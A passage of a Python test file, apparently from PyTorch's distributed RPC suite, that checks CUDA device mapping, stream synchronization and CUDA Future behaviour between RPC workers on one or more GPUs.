backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
# worker1 hosts the model and runs forward. The forward functions
# calls RRef.to_here(), hence needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
# worker2 will get the out RRef and call to_here() and hence, needs
# to configure devcie map.
options.set_device_map(model_dst, {local_device: remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
# training of a CNN of MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
